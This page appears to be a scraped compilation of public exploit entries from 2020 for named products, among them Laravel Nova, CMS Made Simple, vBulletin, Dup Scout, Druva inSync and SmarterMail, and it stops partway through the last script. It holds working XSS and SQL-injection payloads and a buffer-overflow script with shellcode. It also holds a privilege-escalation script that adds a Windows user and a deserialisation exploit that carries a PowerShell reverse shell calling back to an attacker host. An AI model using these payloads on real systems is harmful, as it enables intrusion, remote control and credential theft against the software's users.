ISHACK AI BOT

# Exploit Title: Laravel Nova 3.7.0 - 'range' DoS # Date: June 22, 2020 # Exploit Author: iqzer0 # Vendor Homepage: https://nova.laravel.com/ # Software Link: https://nova.laravel.com/releases # Version: Version v3.7.0 # Tested on: Manjaro / Chrome v83 An authenticated user can crash the application by setting a higher value to the 'range' (default 30) parameter and sending simultaneous requests (10 simultaneous requests was enough to DoS the server in my testing) Vulnerable URL: https://example.com/nova-api/metrics/sum-orders?timezone=Indian%2FMaldives&twelveHourTime=true&range=3000000 Vulnerable Parameter: range

# Exploit Title: Forma LMS 2.3 - 'First & Last Name' Stored Cross-Site Scripting # Date: 04-12-2020 # Exploit Author: Hemant Patidar (HemantSolo) # Vendor Homepage: https://www.formalms.org/download.html # Software Link: https://www.formalms.org/ # Version: 2.3 # Tested on: Windows 10/Kali Linux Steps-To-Reproduce: 1. Go to the Forma LMS and login to your account. 2. Now go to the User Profile. 3. Now Edit the profile. 4. Put the below payload in first and last name: "<script>alert(document.cookie)</script>" 5. Now click on Save button. 6. The XSS will be triggered.

# Exploit Title: CMS Made Simple 2.2.15 - Stored Cross-Site Scripting via SVG File Upload (Authenticated) # Date: 04/12/2020 # Exploit Author: Eshan Singh # Vendor Homepage: https://www.cmsmadesimple.org/ # Software Link: https://www.cmsmadesimple.org/downloads # Version: cmsms v2.2.15 # Tested on: Windows/Kali Linux/Ubuntu Description ---------------------- CMS Made Simple 2.2.15 allows an authenticated user with access to the Content Manager to edit content and put persistent XSS payload using the malicious SVG file. The user can get cookies from every authenticated user who visits the website. SVG Payload ------------- <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" " http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400 "/> <script type="text/javascript"> alert(document.domain); </script> </svg> https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/XSS%20Injection/Files/SVG_XSS.svg Steps to reproduce ------------------- 1. Login into the cmsms admin panel using the admin user. 2. then go to content > file manager > images, now upload the malicious svg ( https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/XSS%20Injection/Files/SVG_XSS.svg) file. 3. now open the svg file location ( http://127.0.0.1/cmsms/uploads//images/SVG_XSS.svg) and BOOM! you got the popup. Burp Request ------------- POST /cmsms/admin/moduleinterface.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1/ X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------379224531139948695983200896304 Content-Length: 1040 Origin: http://127.0.0.1 Connection: close Cookie: a3c9a2f9998cdfdc410fef5f094579cb8f2f3306=c36ffe152373337eee92ec4985172db8528361bf%3A%3AeyJ1aWQiOjEsInVzZXJuYW1lIjoicjB4NHIiLCJlZmZfdWlkIjpudWxsLCJlZmZfdXNlcm5hbWUiOm51bGwsImhhc2giOiIkMnkkMTAkbElVM2FsR2l6UkR0dG5ROHJPVVwvd3V3M3hXano1M0wzYW9pVUhxT2pWQW4xaHNPNjZDLm9HIn0%3D; __c=3d8ee0fbb464e874e82; CMSSESSID5d26ee9cb371=b1gen2isn6vf4g1sal7jdt5upv -----------------------------379224531139948695983200896304 Content-Disposition: form-data; name="mact" FileManager,m1_,upload,0 -----------------------------379224531139948695983200896304 Content-Disposition: form-data; name="__c" 3d8ee0fbb464e874e82 -----------------------------379224531139948695983200896304 Content-Disposition: form-data; name="disable_buffer" 1 -----------------------------379224531139948695983200896304 Content-Disposition: form-data; name="m1_files[]"; filename="SVG_XSS.svg" Content-Type: image/svg+xml <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" " http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert(document.domain); </script> </svg> -----------------------------379224531139948695983200896304--

# Exploit Title: Rumble Mail Server 0.51.3135 - 'rumble_win32.exe' Unquoted Service Path # Date: 2020-9-3 # Exploit Author: Mohammed Alshehri # Vendor Homepage: http://rumble.sf.net/ # Software Link: https://sourceforge.net/projects/rumble/files/Windows%20binaries/rumble_0.51.3135-setup.exe # Version: Version 0.51.3135 # Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763 # Service info: C:\Users\m507>sc qc "RumbleService" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: RumbleService TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\Rumble\rumble_win32.exe --service LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Rumble Mail Server DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\Users\m507> # Exploit: This vulnerability could permit executing code during startup or reboot with the escalated privileges.

# Exploit Title: Zabbix 5.0.0 - Stored XSS via URL Widget Iframe # Date: 8/11/2020 # Exploit Author: Shwetabh Vishnoi # Vendor Homepage: https://www.zabbix.com/ # Software Link: https://www.zabbix.com/download # Affected Version: Zabbix before 3.0.32rc1, 4.x before 4.0.22rc1, 4.1.x through 4.4.x before 4.4.10rc1, and 5.x before 5.0.2rc1 # CVE : CVE-2020-15803 Affected URL/endpoint(s): http://192.168.1.7/zabbix.php?sid=f7ca8c8270ce38c7&action=dashboard.widget.check Affected Param: <iframe src="http://localhost/hello.html" scrolling="auto" id="iframe" class="widget-url" width="100%" height="100%"></iframe> Description: The application contains a widget functionality within Global View Dashboard which can be used by a malicious admin to propagate stored cross site scripting attack. The “URL” widget iframe does not have any inbuilt restrictions for the content executing within. Impact: The malicious webpages within iframes can be used for hosting forms for Phishing, malware propagation, forced redirections etc. The affected Global View dashboard is displayed to all the users of the application, so all the users will be affected with this vulnerability. Reproduction Steps: 1. Login to the application with Admin 2. In Global View Dashboard, Add a widget 3. Select Type – “URL”, fill any random values for Name, Refresh Interval. 4. Now, in the URL parameter, enter a malicious URL. 5. For demo purpose, I have hosted a web server on my machine and hosted a webpage http://localhost/hello.html. (Alternatively, you can use “ http://14.rs” to display popups.) 6. The malicious webpage containing payload will be executed on the dashboard via iFrame. 7. The executed content can redirect the user to a malicious page (We have used Bing page for redirection).

# Exploit Title: Cyber Cafe Management System Project (CCMS) 1.0 - Persistent Cross-Site Scripting # Date: 04-12-2020 # Exploit Author: Pruthvi Nekkanti # Vendor Homepage: https://phpgurukul.com # Product link: https://phpgurukul.com/cyber-cafe-management-system-using-php-mysql/ # Version: 1.0 # Tested on: Kali Linux Attack vector: This vulnerability can results attacker to inject the XSS payload in admin username and each time any user will visits the website, the XSS triggers and attacker can able to steal the cookie according to the crafted payload. Vulnerable Parameters: Admin Username. Steps-To-Reproduce: 1. Go to the Product admin panel change the admin username 2. Put this payload in admin username field:"><script>alert(document.cookie)</script> 3. Now go to the website and the XSS will be triggered.

# Exploit Title: Kite 1.2020.1119.0 - 'KiteService' Unquoted Service Path # Discovery by: Ismael Nava # Discovery Date: 05-12-2020 # Vendor Homepage: https://www.kite.com/ # Software Links : https://www.kite.com/download/ # Tested Version: 1.2020.1119.0 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 64 bits # Step to discover Unquoted Service Path: C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" |findstr /i /v """ KiteService KiteService C:\Program Files\Kite\KiteService.exe Auto C:\>sc qc "KiteService" [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: KiteService TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 0 IGNORE NOMBRE_RUTA_BINARIO: C:\Program Files\Kite\KiteService.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : KiteService DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem

# Exploit Title: TapinRadio 2.13.7 - Denial of Service (PoC) # Date: 2020-05-12 # Exploit Author: Ismael Nava # Vendor Homepage: http://www.raimersoft.com/ # Software Link: www.raimersoft.com/downloads/tapinradio_setup_x64.exe # Version: 2.13.7 x64 # Tested on: Windows 10 Home x64 #STEPS # Open the program TapinRadio # In Settings select Preferences option # Click in Miscellaneous and click in Set Application Proxy # Run the python exploit script, it will create a new .txt files # Copy the content of the file "Mikon.txt" # Paste the content in the field Username and Address and click in OK # Click in Ok again # After TapinRadio closed, the program did not work again if the user try to open again, so it is necessary uninstall and install again # End :) buffer = 'K' * 20000 try: file = open("Mikon.txt","w") file.write(buffer) file.close() print("Archive ready") except: print("Archive no ready")

# Exploit Title: RarmaRadio 2.72.5 - Denial of Service (PoC) # Date: 2020-05-12 # Exploit Author: Ismael Nava # Vendor Homepage: http://www.raimersoft.com/ # Software Link: https://www.raimersoft.com/rarmaradio.html # Version: 2.75.5 # Tested on: Windows 10 Home x64 # CVE : n/a #STEPS # Open the program TapinRadio # In Edit select Settings option # Click in Network # Run the python exploit script, it will create a new .txt files # Copy the content of the file "Paimon.txt" # Paste the content in the field Username, Address and Server and click in OK # End :) buffer = 'K' * 20000 try: file = open("Paimon.txt","w") file.write(buffer) file.close() print("Archive ready") except: print("Archive no ready")

# Exploit Title: Savsoft Quiz 5 - 'Skype ID' Stored XSS # Exploit Author: Dipak Panchal(th3.d1p4k) # Vendor Homepage: https://savsoftquiz.com # Software Link: https://github.com/savsofts/savsoftquiz_v5 # Version: 5 # Tested on Windows 10 Attack Vector: This vulnerability can results attacker to inject the XSS payload in User Registration section and each time admin visits the manage user section from admin panel, and home page too. XSS triggers and attacker can able to steal the cookie according to the crafted payload. Steps to reproduce: 1. Create new account and verified it. 2. Navigate to Edit Profile: -> http://localhost/savsoftquiz/index.php/user/edit_user/123 3. Put the below Payload in Skype ID field. and submit it. Payload: abcd<script>alert("XSS")</script> 4. You will get XSS popup.

# Exploit Title: vBulletin 5.6.3 - 'group' Cross Site Scripting # Date: 05.09.2020 # Author: Vincent666 ibn Winnie # Software Link: https://www.vbulletin.com/en/features/ # Tested on: Windows 10 # Web Browser: Mozilla Firefox & Opera # Google Dorks: "Powered by vBulletin® Version 5.6.3" # Blog: https://pentestvincent.blogspot.com/2020/11/vbulletin-563-admin-cp-multiple.html Go to the "Admin CP" - click on "Styles" - click "Style Manager" - Choose "Denim" or other theme and choose action "Add new template" and click "Go". Put on the title "1" and template "1" and "Save and Reload". Now you can catch the new URL with HTTP Live Headers or with hands. So..we have Url : https://localhost/admincp/template.php?templateid=608&group=&expandset=&searchset=&searchstring=&do=edit&windowScrollTop=168&textareaScrollTop=0 Test it with hands and get cross site scripting. Use for tests different browsers. I use Mozilla Firefox and Opera. https://localhost/admincp/template.php?templateid=1&group=""><script>alert("Cross Site Scripting")</script><script>alert(document.cookie)</script>&expandset=&searchset=&searchstring=&do=edit&windowScrollTop= Picture: https://imgur.com/a/b6gH5Fn

# Dup Scout Enterprise 10.0.18 - 'online_registration' Remote Buffer Overflow # Requires web service to be enabled. # Tested on Windows 10 Pro (x64) # Based on: https://www.exploit-db.com/exploits/43145 and https://www.exploit-db.com/exploits/40457 # Credits: Tulpa and SICKNESS for original exploits # Modified: @0rbz_ import socket,os,time,struct,argparse,sys parser = argparse.ArgumentParser() parser.add_argument('--host', required=True) args = parser.parse_args() host = args.host port = 80 # msfvenom --platform windows -p windows/exec CMD=calc.exe -b "\x00\x0a\x0d\x25\x26\x2b\x3d" -f py buf = "" buf += "\xb8\xa0\xa1\xfd\x38\xd9\xf7\xd9\x74\x24\xf4\x5a\x31" buf += "\xc9\xb1\x31\x31\x42\x13\x83\xc2\x04\x03\x42\xaf\x43" buf += "\x08\xc4\x47\x01\xf3\x35\x97\x66\x7d\xd0\xa6\xa6\x19" buf += "\x90\x98\x16\x69\xf4\x14\xdc\x3f\xed\xaf\x90\x97\x02" buf += "\x18\x1e\xce\x2d\x99\x33\x32\x2f\x19\x4e\x67\x8f\x20" buf += "\x81\x7a\xce\x65\xfc\x77\x82\x3e\x8a\x2a\x33\x4b\xc6" buf += "\xf6\xb8\x07\xc6\x7e\x5c\xdf\xe9\xaf\xf3\x54\xb0\x6f" buf += "\xf5\xb9\xc8\x39\xed\xde\xf5\xf0\x86\x14\x81\x02\x4f" buf += "\x65\x6a\xa8\xae\x4a\x99\xb0\xf7\x6c\x42\xc7\x01\x8f" buf += "\xff\xd0\xd5\xf2\xdb\x55\xce\x54\xaf\xce\x2a\x65\x7c" buf += "\x88\xb9\x69\xc9\xde\xe6\x6d\xcc\x33\x9d\x89\x45\xb2" buf += "\x72\x18\x1d\x91\x56\x41\xc5\xb8\xcf\x2f\xa8\xc5\x10" buf += "\x90\x15\x60\x5a\x3c\x41\x19\x01\x2a\x94\xaf\x3f\x18" buf += "\x96\xaf\x3f\x0c\xff\x9e\xb4\xc3\x78\x1f\x1f\xa0\x77" buf += "\x55\x02\x80\x1f\x30\xd6\x91\x7d\xc3\x0c\xd5\x7b\x40" buf += "\xa5\xa5\x7f\x58\xcc\xa0\xc4\xde\x3c\xd8\x55\x8b\x42" buf += "\x4f\x55\x9e\x20\x0e\xc5\x42\x89\xb5\x6d\xe0\xd5" buffer = "\x41" * 260 buffer += struct.pack("<L", 0x10090c83) # JMP ESP - libspp buffer += "\x90" * 20 buffer += buf buffer += "\x90" * (10000 - len(buffer)) evil = "POST /online_registration HTTP/1.1\r\n" evil += "Host: " + sys.argv[2] +"\r\n" evil += "User-Agent: Mozilla/5.0\r\n" evil += "Connection: close\r\n" evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" evil += "Accept-Language: en-us,en;q=0.5\r\n" evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n" evil += "Keep-Alive: 300\r\n" evil += "Proxy-Connection: keep-alive\r\n" evil += "Content-Type: application/x-www-form-urlencoded\r\n" evil += "Content-Length: 17000\r\n\r\n" evil += "customer_name=" + buffer evil += "&unlock_key=" + buffer + "\r\n" s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) connect=s.connect((host,port)) print 'Sending evil buffer...' s.send(evil) print 'Payload Sent!' s.close()

# Exploit Title: Online Bus Ticket Reservation 1.0 - SQL Injection # Date: 2020-12-07 # Exploit Author: Sakshi Sharma # Vendor Homepage: https://www.sourcecodester.com/php/5012/online-bus-ticket-reservation-using-phpmysql.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/busreservation.zip # Version: 1.0 # Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4 #Vulnerable Page: admin page #Exploit Open the Application check the URL: http://localhost/busreservation/index.php Open Admin Login Enter username: 'or"=' Enter password: 'or"=' click on login The SQL payload gets executed and authorization is bypassed successfully

# Exploit Title: Druva inSync Windows Client 6.6.3 - Local Privilege Escalation (PowerShell) # Date: 2020-12-03 # Exploit Author: 1F98D # Original Author: Matteo Malvica # Vendor Homepage: druva.com # Software Link: https://downloads.druva.com/downloads/inSync/Windows/6.6.3/inSync6.6.3r102156.msi # Version: 6.6.3 # Tested on: Windows 10 (x64) # CVE: CVE-2020-5752 # References: https://www.matteomalvica.com/blog/2020/05/21/lpe-path-traversal/ # Druva inSync exposes an RPC service which is vulnerable to a command injection attack. $ErrorActionPreference = "Stop" $cmd = "net user pwnd /add" $s = New-Object System.Net.Sockets.Socket( [System.Net.Sockets.AddressFamily]::InterNetwork, [System.Net.Sockets.SocketType]::Stream, [System.Net.Sockets.ProtocolType]::Tcp ) $s.Connect("127.0.0.1", 6064) $header = [System.Text.Encoding]::UTF8.GetBytes("inSync PHC RPCW[v0002]") $rpcType = [System.Text.Encoding]::UTF8.GetBytes("$([char]0x0005)`0`0`0") $command = [System.Text.Encoding]::Unicode.GetBytes("C:\ProgramData\Druva\inSync4\..\..\..\Windows\System32\cmd.exe /c $cmd"); $length = [System.BitConverter]::GetBytes($command.Length); $s.Send($header) $s.Send($rpcType) $s.Send($length) $s.Send($command)

# Exploit Title: Microsoft GamingServices 2.47.10001.0 - 'GamingServices' Unquoted Service Path # Discovery by: Ismael Nava # Discovery Date: 02-12-2020 # Vendor Homepage: https://www.microsoft.com # Software Links : https://www.microsoft.com/en-us/p/xbox-beta/9mv0b5hzvk9z?activetab=pivot:overviewtab # Tested Version: 2.47.10001.0 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 64 bits # Step to discover Unquoted Service Path: C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" |findstr /i /v """ GamingServices GamingServices C:\Program Files\WindowsApps\Microsoft.GamingServices_2.47.10001.0_x64__8wekyb3d8bbwe\GamingServices.exe Auto GamingServicesNet GamingServicesNet C:\Program Files\WindowsApps\Microsoft.GamingServices_2.47.10001.0_x64__8wekyb3d8bbwe\GamingServicesNet.exe Auto C:\>sc qc "GamingServicesNet" [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: GamingServicesNet TIPO : 210 WIN32_PACKAGED_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 0 IGNORE NOMBRE_RUTA_BINARIO: C:\Program Files\WindowsApps\Microsoft.GamingServices_2.47.10001.0_x64__8wekyb3d8bbwe\GamingServicesNet.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : GamingServicesNet DEPENDENCIAS : staterepository NOMBRE_INICIO_SERVICIO: NT AUTHORITY\LocalService C:\>sc qc "GamingServices" [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: GamingServices TIPO : 210 WIN32_PACKAGED_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 0 IGNORE NOMBRE_RUTA_BINARIO: C:\Program Files\WindowsApps\Microsoft.GamingServices_2.47.10001.0_x64__8wekyb3d8bbwe\GamingServices.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : GamingServices DEPENDENCIAS : staterepository NOMBRE_INICIO_SERVICIO: LocalSystem

# Exploit Title: Employee Performance Evaluation System 1.0 - ' Task and Description' Persistent Cross Site Scripting # Date: 08/12/2020 # Exploit Author: Ritesh Gohil # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/14617/employee-performance-evaluation-system-phpmysqli-source-code.html # Version: 1.0 # Tested on: Windows 10/Kali Linux Steps to Reproduce: 1) Login with Admin Credentials and click on 'Task' button. 2) Click on Add New Task Button. 3) Now add the following payload input field of Task and Description Payload: ritesh"><img src=x onerror=alert(document.domain)> 4) Click On Save 5) XSS payload is triggered.

# Exploit Title: SmarterMail Build 6985 - Remote Code Execution # Exploit Author: 1F98D # Original Author: Soroush Dalili # Date: 10 May 2020 # Vendor Hompage: re # CVE: CVE-2019-7214 # Tested on: Windows 10 x64 # References: # https://www.nccgroup.trust/uk/our-research/technical-advisory-multiple-vulnerabilities-in-smartermail/ # # SmarterMail before build 6985 provides a .NET remoting endpoint # which is vulnerable to a .NET deserialisation attack. # #!/usr/bin/python3 import base64 import socket import sys from struct import pack HOST='192.168.1.1' PORT=17001 LHOST='192.168.1.2' LPORT=4444 psh_shell = '$client = New-Object System.Net.Sockets.TCPClient("'+LHOST+'",'+str(LPORT)+');$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 =$sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' psh_shell = psh_shell.encode('utf-16')[2:] # remove BOM psh_shell = base64.b64encode(psh_shell) psh_shell = psh_shell.ljust(1360, b' ') payload = 'AAEAAAD/////AQAAAAAAAAAMAgAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BQEAAACEAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLlNvcnRlZFNldGAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAFQ291bnQIQ29tcGFyZXIHVmVyc2lvbgVJdGVtcwADAAYIjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0IAgAAAAIAAAAJAwAAAAIAAAAJBAAAAAQDAAAAjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0BAAAAC19jb21wYXJpc29uAyJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyCQUAAAARBAAAAAIAAAAGBgAAAPIKL2MgcG93ZXJzaGVsbC5leGUgLWVuY29kZWRDb21tYW5kIFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFgGBwAAAANjbWQEBQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQdtZXRob2QwB21ldGhvZDEDAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5L1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyCQgAAAAJCQAAAAkKAAAABAgAAAAwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BwAAAAR0eXBlCGFzc2VtYmx5BnRhcmdldBJ0YXJnZXRUeXBlQXNzZW1ibHkOdGFyZ2V0VHlwZU5hbWUKbWV0aG9kTmFtZQ1kZWxlZ2F0ZUVudHJ5AQECAQEBAzBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkGCwAAALACU3lzdGVtLkZ1bmNgM1tbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MsIFN5c3RlbSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQYMAAAAS21zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OQoGDQAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5Bg4AAAAaU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MGDwAAAAVTdGFydAkQAAAABAkAAAAvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIHAAAABE5hbWUMQXNzZW1ibHlOYW1lCUNsYXNzTmFtZQlTaWduYXR1cmUKU2lnbmF0dXJlMgpNZW1iZXJUeXBlEEdlbmVyaWNBcmd1bWVudHMBAQEBAQADCA1TeXN0ZW0uVHlwZVtdCQ8AAAAJDQAAAAkOAAAABhQAAAA+U3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MgU3RhcnQoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGFQAAAD5TeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcyBTdGFydChTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKAQoAAAAJAAAABhYAAAAHQ29tcGFyZQkMAAAABhgAAAANU3lzdGVtLlN0cmluZwYZAAAAK0ludDMyIENvbXBhcmUoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGGgAAADJTeXN0ZW0uSW50MzIgQ29tcGFyZShTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKARAAAAAIAAAABhsAAABxU3lzdGVtLkNvbXBhcmlzb25gMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JDAAAAAoJDAAAAAkYAAAACRYAAAAKCw==' payload = base64.b64decode(payload) payload = 